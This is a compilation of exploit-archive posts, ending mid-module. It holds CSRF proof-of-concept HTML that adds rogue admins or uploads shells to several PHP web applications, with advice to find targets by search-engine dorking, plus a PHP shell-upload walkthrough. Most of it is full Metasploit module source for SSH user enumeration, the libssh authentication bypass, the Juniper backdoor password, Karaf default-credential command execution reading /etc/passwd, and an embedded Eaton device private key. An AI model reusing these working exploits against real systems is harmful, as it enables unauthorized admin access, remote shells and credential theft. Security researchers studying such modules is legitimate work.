File Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : File Management System 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload :  <form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  <div class="modal-dialog" role="document">    <div class="modal-content">      <div class="modal-header text-center">        <h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>        <button type="button" class="close" data-dismiss="modal" aria-label="Close">          <span aria-hidden="true">&times;</span>        </button>      </div>      <div class="modal-body mx-3">           <div class="md-form mb-5">          <input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">        </div>        <div class="md-form mb-5">          <i class="fas fa-user prefix grey-text"></i>          <input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>        </div>        <div class="md-form mb-5">          <i class="fas fa-envelope prefix grey-text"></i>          <input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>        </div>        <div class="md-form mb-4">          <i class="fas fa-lock prefix grey-text"></i>          <input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>        </div>      </div>      <div class="modal-footer d-flex justify-content-center">        <button class="btn btn-info" name="reg">Sign up</button>    Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Management System 1.0 Cross Site Request Forgery

Faculty Evaluation System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Faculty Evaluation System 1.0 CSRF Add Admin Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 35 : Set your target.

[+] Save As poc.html

[+] Payload :

  <!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/eval/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Shell Path : http://127.0.0.1/eval/assets/uploads/

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Faculty Evaluation System 1.0 Cross Site Request Forgery

eClass LMS version 6.2.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : eClass LMS v6.2.0 shell upload Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/eclass-learning-management-system/25613271                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

eClass LMS 6.2.0 Shell Upload

Free Hospital Management System for Small Practices version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Vaidya-Mitra v 1.0 CSRF Vulnerability  
                                                                   |  
| # Author    : indoushka  
                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1  
(64 bits)                                                            |  
| # Vendor    :  
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
                             |

=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin.

[+] Go to the line 9. Set the target site link Save changes and apply .

[+] infected file : vm/create-account.php.

[+] save code as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width,  
initial-scale=1.0">  
    <title>Create Account</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/vm/create-account.php" method="POST">  
        <label for="newemail">Email:</label>  
        <input type="email" id="newemail" name="newemail" required>  
        <br>

        <label for="tele">Telephone:</label>  
        <input type="text" id="tele" name="tele" required>  
        <br>

        <label for="newpassword">Password:</label>  
        <input type="password" id="newpassword" name="newpassword"  
required>  
        <br>

        <label for="cpassword">Confirm Password:</label>  
        <input type="password" id="cpassword" name="cpassword" required>  
        <br>

        <button type="submit">Create Account</button>  
    </form>  
</body>  
</html>

Greetings to  
:============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr  
|

==========================================================================

Free Hospital Management System For Small Practices 1.0 CSRF

This Metasploit module uses a dictionary to brute force valid usernames from Cerberus FTP server via SFTP. This issue affects all versions of the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy in the way the SSH service handles failed logins for valid and invalid users. This issue was discovered by Steve Embling.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'        => 'Cerberus FTP Server SFTP Username Enumeration',      'Description' => %q{        This module uses a dictionary to brute force valid usernames from        Cerberus FTP server via SFTP.  This issue affects all versions of        the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy        in the way the SSH service handles failed logins for valid and invalid        users.  This issue was discovered by Steve Embling.      },      'Author'      => [        'Steve Embling', # Discovery        'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module      ],      'References'     =>        [          [ 'URL',  'http://xforce.iss.net/xforce/xfdb/93546' ],          [ 'BID', '67707']        ],      'License'     => MSF_LICENSE,      'DisclosureDate' => '2014-05-27'    ))    register_options(      [        Opt::Proxies,        Opt::RPORT(22),        OptPath.new(          'USER_FILE',          [true, 'Files containing usernames, one per line', nil])      ], self.class    )    register_advanced_options(      [        OptInt.new(          'RETRY_NUM',          [true , 'The number of attempts to connect to a SSH server for each user', 3]),        OptInt.new(          'SSH_TIMEOUT',          [true, 'Specify the maximum time to negotiate a SSH session', 10]),        OptBool.new(          'SSH_DEBUG',          [true, 'Enable SSH debugging output (Extreme verbosity!)', false])      ]    )  end  def rport    datastore['RPORT']  end  def retry_num    datastore['RETRY_NUM']  end  def check_vulnerable(ip)    opt_hash = {      :port            => rport,      :auth_methods    => ['password', 'keyboard-interactive'],      :use_agent       => false,      :config          => false,      :password_prompt => Net::SSH::Prompt.new,      :non_interactive => true,      :proxies         => datastore['Proxies'],      :verify_host_key => :never    }    begin      transport = Net::SSH::Transport::Session.new(ip, opt_hash)    rescue Rex::ConnectionError      return :connection_error    end    auth = Net::SSH::Authentication::Session.new(transport, opt_hash)    auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))    auth_method = auth.allowed_auth_methods.join('|')    print_good "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"    report_service(      host:  ip,      port:  rport,      name:  "ssh",      proto: "tcp",      info:  auth.transport.server_version.version    )    if auth_method.empty?      :vulnerable    else      :safe    end  end  def check_user(ip, user, port)    pass = Rex::Text.rand_text_alphanumeric(8)    opt_hash = {      :auth_methods    => ['password', 'keyboard-interactive'],      :port            => port,      :use_agent       => false,      :config          => false,      :proxies         => datastore['Proxies'],      :verify_host_key => :never    }    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']    transport = Net::SSH::Transport::Session.new(ip, opt_hash)    auth = Net::SSH::Authentication::Session.new(transport, opt_hash)    begin      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        auth.authenticate("ssh-connection", user, pass)        auth_method = auth.allowed_auth_methods.join('|')        if auth_method != ''          :success        else          :fail        end      end    rescue Rex::ConnectionError      return :connection_error    rescue Net::SSH::Disconnect, ::EOFError      return :success    rescue ::Timeout::Error      return :connection_error    end  end  def do_report(ip, user, port)    service_data = {      address: ip,      port: rport,      service_name: 'ssh',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: user,    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,    }.merge(service_data)    create_credential_login(login_data)  end  def peer(rhost=nil)    "#{rhost}:#{rport} SSH -"  end  def user_list    users = nil    if File.readable? datastore['USER_FILE']      users = File.new(datastore['USER_FILE']).read.split      users.each {|u| u.downcase!}      users.uniq!    else      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"    end    users  end  def attempt_user(user, ip)    attempt_num = 0    ret = nil    while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)      if attempt_num > 0        Rex.sleep(2 ** attempt_num)        vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")      end      ret = check_user(ip, user, rport)      attempt_num += 1    end    ret  end  def show_result(attempt_result, user, ip)    case attempt_result    when :success      print_good "#{peer(ip)} User '#{user}' found"      do_report(ip, user, rport)    when :connection_error      print_error "#{peer(ip)} User '#{user}' could not connect"    when :fail      vprint_status "#{peer(ip)} User '#{user}' not found"    end  end  def run_host(ip)    print_status "#{peer(ip)} Checking for vulnerability"    case check_vulnerable(ip)    when :vulnerable      print_good "#{peer(ip)} Vulnerable"      print_status "#{peer(ip)} Starting scan"      user_list.each do |user|        show_result(attempt_user(user, ip), user, ip)      end    when :safe      print_error "#{peer(ip)} Not vulnerable"    when :connection_error      print_error "#{peer(ip)} Connection failed"    end  endend

Cerberus FTP Server SFTP Username Enumeration

This Metasploit module exploits an authentication bypass in libssh server code where a USERAUTH_SUCCESS message is sent in place of the expected USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 are vulnerable. Note that this modules success depends on whether the server code can trigger the correct (shell/exec) callbacks despite only the state machines authenticated state being set. Therefore, you may or may not get a shell if the server requires additional code paths to be followed.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Auxiliary::Report  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'libssh Authentication Bypass Scanner',      'Description'    => %q{        This module exploits an authentication bypass in libssh server code        where a USERAUTH_SUCCESS message is sent in place of the expected        USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and        0.8.0 through 0.8.3 are vulnerable.        Note that this module's success depends on whether the server code        can trigger the correct (shell/exec) callbacks despite only the state        machine's authenticated state being set.        Therefore, you may or may not get a shell if the server requires        additional code paths to be followed.      },      'Author'         => [        'Peter Winter-Smith', # Discovery        'wvu'                 # Module      ],      'References'     => [        ['CVE', '2018-10933'],        ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']      ],      'DisclosureDate' => '2018-10-16',      'License'        => MSF_LICENSE,      'Actions'        => [        ['Shell',   'Description' => 'Spawn a shell'],        ['Execute', 'Description' => 'Execute a command']      ],      'DefaultAction'  => 'Shell'    ))    register_options([      Opt::RPORT(22),      OptString.new('CMD',        [false, 'Command or alternative shell']),      OptBool.new('SPAWN_PTY',    [false, 'Spawn a PTY', false]),      OptBool.new('CHECK_BANNER', [false, 'Check banner for libssh', true])    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  # Vulnerable since 0.6.0 and patched in 0.7.6 and 0.8.4  def check_banner(ip, version)    version =~ /libssh[_-]?([\d.]*)$/ && $1 && (v = Rex::Version.new($1))    if v.nil?      vprint_error("#{ip}:#{rport} - #{version} does not appear to be libssh")      Exploit::CheckCode::Unknown    elsif v.to_s.empty?      vprint_warning("#{ip}:#{rport} - libssh version not reported")      Exploit::CheckCode::Detected    elsif v.between?(Rex::Version.new('0.6.0'), Rex::Version.new('0.7.5')) ||          v.between?(Rex::Version.new('0.8.0'), Rex::Version.new('0.8.3'))      vprint_good("#{ip}:#{rport} - #{version} appears to be unpatched")      Exploit::CheckCode::Appears    else      vprint_error("#{ip}:#{rport} - #{version} appears to be patched")      Exploit::CheckCode::Safe    end  end  def run_host(ip)    if action.name == 'Execute' && datastore['CMD'].blank?      fail_with(Failure::BadConfig, 'Execute action requires CMD to be set')    end    ssh_opts = ssh_client_defaults.merge({      port:            rport,      # The auth method is converted into a class name for instantiation,      # so libssh-auth-bypass here becomes LibsshAuthBypass from the mixin      auth_methods:    ['libssh-auth-bypass']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    print_status("#{ip}:#{rport} - Attempting authentication bypass")    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, username, ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    version = ssh.transport.server_version.version    # XXX: The OOB authentication leads to false positives, so check banner    if datastore['CHECK_BANNER']      return if check_banner(ip, version) !=        (Exploit::CheckCode::Appears || Exploit::CheckCode::Detected)    end    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh, datastore['CMD'], pty: datastore['SPAWN_PTY'])    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    print_status("Attempting #{action.name.inspect} Action, see \"show actions\" for more details")    case action.name    when 'Shell'      if datastore['CreateSession']        start_session(self, "#{self.name} (#{version})", {}, false, shell.lsock)      end    when 'Execute'      output = shell.channel && (shell.channel[:data] || '').chomp      if output.blank?        print_error("#{ip}:#{rport} - Empty or blank command output")        return      end      print_status("#{ip}:#{rport} - Executed: #{datastore['CMD']}\n#{output}")    end  end  def rport    datastore['RPORT']  end  def username    Rex::Text.rand_text_alphanumeric(8..42)  endend

Libssh Authentication Bypass Scanner

This Metasploit module scans for the Juniper SSH backdoor (also valid on Telnet). Any username is required, and the password is <<< %s(un=%s) = %u.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  def initialize(info = {})    super(update_info(info,      'Name'           => 'Juniper SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Juniper SSH backdoor (also valid on Telnet).        Any username is required, and the password is <<< %s(un='%s') = %u.      },      'Author'         => [        'hdm',                               # Discovery        'h00die <mike[at]stcyrsecurity.com>' # Module      ],      'References'     => [        ['CVE', '2015-7755'],        ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],        ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']      ],      'DisclosureDate' => '2015-12-20',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    ssh_opts = ssh_client_defaults.merge({      :port            => rport,      :auth_methods    => ['password', 'keyboard-interactive'],      :password        => %q{<<< %s(un='%s') = %u},    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(          ip,          'admin',          ssh_opts        )      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    if ssh      print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")      report_vuln(        :host => ip,        :name => self.name,        :refs => self.references,        :info => ssh.transport.server_version.version      )    end  end  def rport    datastore['RPORT']  endend

Juniper SSH Backdoor Scanner

This Metasploit module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. The karaf user has a known default password, which can be used to login to the SSH service, and execute operating system commands from remote.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  def initialize(info={})    super(update_info(info,      'Name'           => "Apache Karaf Default Credentials Command Execution",      'Description'    => %q{        This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.        The 'karaf' user has a known default password, which can be used to login to the        SSH service, and execute operating system commands from remote.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Nicholas Starke <nick@alephvoid.com>'        ],      'Platform'       => 'unix',      'Arch'           => ARCH_CMD,      'Privileged'     => true,      'DisclosureDate' => '2016-02-09'))    register_options(      [        Opt::RPORT(8101),        OptString.new('USERNAME', [true, 'Username', 'karaf']),        OptString.new('PASSWORD', [true, 'Password', 'karaf']),        OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])      ], self.class    )    register_advanced_options(      [        Opt::Proxies,        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])      ]    )  end  def rport    datastore['RPORT']  end  def username    datastore['USERNAME']  end  def password    datastore['PASSWORD']  end  def cmd    datastore['CMD']  end  def do_login(user, pass, ip)    opts = ssh_client_defaults.merge({      :auth_methods    => ['password'],      :port            => rport,      :password        => pass,    })    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, user, opts)      end      if ssh        print_good("#{ip}:#{rport} - Login Successful ('#{user}:#{pass})'")      else        print_error "#{ip}:#{rport} - Unknown error"      end    rescue OpenSSL::Cipher::CipherError => e      print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})")      return    rescue Rex::ConnectionError      return    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{ip}:#{rport} SSH - Disconnected during negotiation"      return    rescue ::Timeout::Error      print_error "#{ip}:#{rport} SSH - Timed out during negotiation"      return    rescue Net::SSH::AuthenticationFailed      print_error "#{ip}:#{rport} SSH - Failed authentication"    rescue Net::SSH::Exception => e      print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}"      return    end    ssh  end  def run_host(ip)    print_status("#{ip}:#{rport} - Attempt to login...")    ssh = do_login(username, password, ip)    if ssh      output = ssh.exec!("#{cmd}\n").to_s      if output        print_good("#{ip}:#{rport} - Command successfully executed.  Output: #{output}")        store_loot("apache.karaf.command",                "text/plain",                ip,                output)        vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command")      else        print_error "#{ip}:#{rport} - Command failed to execute"      end    end  endend

Apache Karaf Default Credentials Command Execution

Eaton Power Xpert Meters running firmware below version 12.x.x.x or below version 13.3.x.x ship with a public/private key pair that facilitate remote administrative access to the devices. Tested on: Firmware 12.1.9.1 and 13.3.2.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework#### XXX: This shouldn't be necessary but is nowrequire 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Auxiliary::Report  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',      'Description'    => %q{        Eaton Power Xpert Meters running firmware below version 12.x.x.x or        below version 13.3.x.x ship with a public/private key pair that        facilitate remote administrative access to the devices.        Tested on: Firmware 12.1.9.1 and 13.3.2.10.      },      'Author'         => [        'BrianWGray'      ],      'References'     => [        ['CVE', '2018-16158'],        ['EDB', '45283'],        ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],        ['URL', 'https://www.ctrlu.net/vuln/0006.html']      ],      'DisclosureDate' => '2018-07-18',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.    ssh_opts = ssh_client_defaults.merge({      auth_methods:    ['publickey'],      port:            rport,      key_data:        [ key_data ],      hmac:            ['hmac-sha1'],      encryption:      ['aes128-cbc'],      kex:             ['diffie-hellman-group1-sha1'],      host_key:        ['ssh-rsa']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'admin', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as admin")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'admin'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  end  def key_data    <<EOF-----BEGIN RSA PRIVATE KEY-----MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4MjC15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDglTyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKBgQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQPI3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2WgA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaBtrQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZdO0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJfz54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+zzyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==-----END RSA PRIVATE KEY-----EOF  endend

Eaton Xpert Meter SSH Private Key Exposure Scanner

This Metasploit module uses a malformed packet or timing attack to enumerate users on an OpenSSH server. The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST packet using public key authentication (must be enabled) to enumerate users. On some versions of OpenSSH under some configurations, OpenSSH will return a "permission denied" error for an invalid user faster than for a valid user, creating an opportunity for a timing attack to enumerate users. Testing note: invalid users were logged, while valid users were not. YMMV.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SSH Username Enumeration',        'Description' => %q{          This module uses a malformed packet or timing attack to enumerate users on          an OpenSSH server.          The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST          packet using public key authentication (must be enabled) to enumerate users.          On some versions of OpenSSH under some configurations, OpenSSH will return a          "permission denied" error for an invalid user faster than for a valid user,          creating an opportunity for a timing attack to enumerate users.          Testing note: invalid users were logged, while valid users were not. YMMV.        },        'Author' => [          'kenkeiras',     # Timing attack          'Dariusz Tytko', # Malformed packet          'Michal Sajdak', # Malformed packet          'Qualys',        # Malformed packet          'wvu'            # Malformed packet        ],        'References' => [          ['CVE', '2003-0190'],          ['CVE', '2006-5229'],          ['CVE', '2016-6210'],          ['CVE', '2018-15473'],          ['OSVDB', '32721'],          ['BID', '20418'],          ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],          ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']        ],        'License' => MSF_LICENSE,        'Actions' => [          [            'Malformed Packet',            {              'Description' => 'Use a malformed packet',              'Type' => :malformed_packet            }          ],          [            'Timing Attack',            {              'Description' => 'Use a timing attack',              'Type' => :timing_attack            }          ]        ],        'DefaultAction' => 'Malformed Packet',        'Notes' => {          'Stability' => [            CRASH_SERVICE_DOWN # possible that a malformed packet may crash the service          ],          'Reliability' => [],          'SideEffects' => [            IOC_IN_LOGS,            ACCOUNT_LOCKOUTS, # timing attack submits a password          ]        }      )    )    register_options(      [        Opt::Proxies,        Opt::RPORT(22),        OptString.new('USERNAME',                      [false, 'Single username to test (username spray)']),        OptPath.new('USER_FILE',                    [false, 'File containing usernames, one per line']),        OptBool.new('DB_ALL_USERS',                    [false, 'Add all users in the current database to the list', false]),        OptInt.new('THRESHOLD',                   [                     true,                     'Amount of seconds needed before a user is considered ' \                     'found (timing attack only)', 10                   ]),        OptBool.new('CHECK_FALSE',                    [false, 'Check for false positives (random username)', true])      ]    )    register_advanced_options(      [        OptInt.new('RETRY_NUM',                   [                     true, 'The number of attempts to connect to a SSH server' \                   ' for each user', 3                   ]),        OptInt.new('SSH_TIMEOUT',                   [                     false, 'Specify the maximum time to negotiate a SSH session',                     10                   ]),        OptBool.new('SSH_DEBUG',                    [                      false, 'Enable SSH debugging output (Extreme verbosity!)',                      false                    ])      ]    )  end  def rport    datastore['RPORT']  end  def retry_num    datastore['RETRY_NUM']  end  def threshold    datastore['THRESHOLD']  end  # Returns true if a nonsense username appears active.  def check_false_positive(ip)    user = Rex::Text.rand_text_alphanumeric(8..32)    attempt_user(user, ip) == :success  end  def check_user(ip, user, port)    technique = action['Type']    opts = ssh_client_defaults.merge({      port: port    })    # The auth method is converted into a class name for instantiation,    # so malformed-packet here becomes MalformedPacket from the mixin    case technique    when :malformed_packet      opts.merge!(auth_methods: ['malformed-packet'])    when :timing_attack      opts.merge!(        auth_methods: ['password', 'keyboard-interactive'],        password: rand_pass      )    end    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    start_time = Time.new    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, user, opts)      end    rescue Rex::ConnectionError      return :connection_error    rescue Timeout::Error      return :success if technique == :timing_attack    rescue Net::SSH::AuthenticationFailed      return :fail if technique == :malformed_packet    rescue Net::SSH::Exception => e      vprint_error("#{e.class}: #{e.message}")    end    finish_time = Time.new    case technique    when :malformed_packet      return :success if ssh    when :timing_attack      return :success if (finish_time - start_time > threshold)    end    :fail  end  def rand_pass    Rex::Text.rand_text_english(64_000..65_000)  end  def do_report(ip, user, _port)    service_data = {      address: ip,      port: rport,      service_name: 'ssh',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: user    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED    }.merge(service_data)    create_credential_login(login_data)  end  # 